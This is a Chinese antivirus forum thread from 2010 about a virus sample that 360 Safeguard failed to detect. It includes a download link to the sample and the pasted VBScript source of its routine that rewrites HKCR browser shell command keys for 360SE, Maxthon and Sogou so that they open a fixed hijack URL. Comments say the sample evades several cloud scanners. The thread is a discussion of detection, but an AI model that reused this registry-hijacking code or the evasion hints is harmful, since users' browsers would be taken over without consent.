360也有抽筋的时候

zzirong

卡饭又抽了，附件上传不了
提供网盘下载病毒样本：http://v4.u.115.com/file/t5de51290c

不知道为什么网盾可以查出来，360卫士却查不出来，运行之，360无反应，病毒成功启动


2010-10-23 15:49 上传
下载附件 (27.77 KB)



下载附件 (56.33 KB)

jefffire

你这个病毒是开源的？ 压根没加密

嘻嘻哈哈011

卡饭抽了，360也抽了——双抽啊？

哈哈。。。我这里下载不了，难道是我的RPWT？

zzirong

回复 2楼 jefffire 的帖子

现在流行开源嘛

jinzijie

jefffire 发表于 2010-10-23 15:57
你这个病毒是开源的？ 压根没加密

的确很无语。。。

jefffire

这是出处？
http://www.ycrack.com/read.php?tid=455

jefffire

1. Public Sub SetRegDefaultOpenUrl()   
   
2. On Error Resume Next
   
3.     dim url
   
4.     url="http://www.59688.com/?my"
   
5.     dim ie_temp_path
   
6.     ie_temp_path=GetWebBrowserPath() '获取一个浏览器路径   
   
7.     Set fso = CreateObject("Scripting.FileSystemObject")   
   
8.     If not fso.FileExists(ie_temp_path) Then  '不存在则读取默认
   
9.       ie_temp_path=iePath
   
10.     End If
    
11.     Set fso  = Nothing
    
12.     Const HKEY_CLASSES_ROOT = &H80000000
    
13.     strComputer = "."
    
14.     Set StdOut = WScript.StdOut   
    
15.     Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\" & strComputer & "\root\default:StdRegProv")   
    
16.    
    
17.     strKeyPath = "HTTP\shell\360SE.exe\command"
    
18.     kkbbzz1Name = ""
    
19.    
    
20.     oReg.GetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,_   
    
21.     kkbbzz1Name,kkbbzz1
    
22.    
    
23.     if kkbbzz1<>"" or instr(kkbbzz1,url)=0 then
    
24.         '写入值到节点
    
25.         kkbbzz1Name = ""  
    
26.         kkbbzz1 = """" & ie_temp_path & """" & " " & url & " " & "%1"
    
27.         oReg.SetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,kkbbzz1Name,kkbbzz1  
    
28.     end if
    
29.    
    
30.     strKeyPath = "HTTP\shell\open\command"  
    
31.     kkbbzz1Name = ""  
    
32.     oReg.GetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,_   
    
33.     kkbbzz1Name,kkbbzz1
    
34.    
    
35.     if kkbbzz1<>"" or instr(kkbbzz1,url)=0 then
    
36.         '写入值到节点
    
37.         kkbbzz1Name = ""  
    
38.         kkbbzz1 = """" & ie_temp_path & """" & " " & url & " " & "%1"
    
39.         'oReg.SetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,kkbbzz1Name,kkbbzz1  
    
40.     end if
    
41.    
    
42.     strKeyPath = "HTTP\shell\Maxthon2\command"
    
43.     kkbbzz1Name = ""
    
44.    
    
45.     oReg.GetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,_   
    
46.     kkbbzz1Name,kkbbzz1
    
47.    
    
48.     if kkbbzz1<>"" or instr(kkbbzz1,url)=0 then
    
49.         '写入值到节点
    
50.         kkbbzz1Name = ""  
    
51.         kkbbzz1 = """" & ie_temp_path & """" & " " & url & " " & "%1"
    
52.         oReg.SetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,kkbbzz1Name,kkbbzz1  
    
53.     end if
    
54.    
    
55.     strKeyPath = "HTTP\shell\SogouExplorer\command"
    
56.     kkbbzz1Name = ""
    
57.    
    
58.     oReg.GetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,_   
    
59.     kkbbzz1Name,kkbbzz1
    
60.    
    
61.     if kkbbzz1<>"" or instr(kkbbzz1,url)=0 then
    
62.         '写入值到节点
    
63.         kkbbzz1Name = ""  
    
64.         kkbbzz1 = """" & ie_temp_path & """" & " " & url & " " & "%1"
    
65.         oReg.SetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,kkbbzz1Name,kkbbzz1  
    
66.     end if
    
67. End Sub
    

复制代码

有点意思

jefffire

zzirong 发表于 2010-10-23 15:52
卡饭又抽了，附件上传不了
提供网盘下载病毒样本：http://v4.u.115.com/file/t5de51290c

恭喜，过数字云，可牛云，金山云，NPE[:26:]   VBE果然是盲点

q4585406

360卫士不支持压缩包扫描和脱壳的！而网盾是利用URL之类检测的。要测试就要测360杀毒，完整的查杀功能。

q4585406

你可以解压后扫描试试看，不过程序加壳严重的话卫士是不管的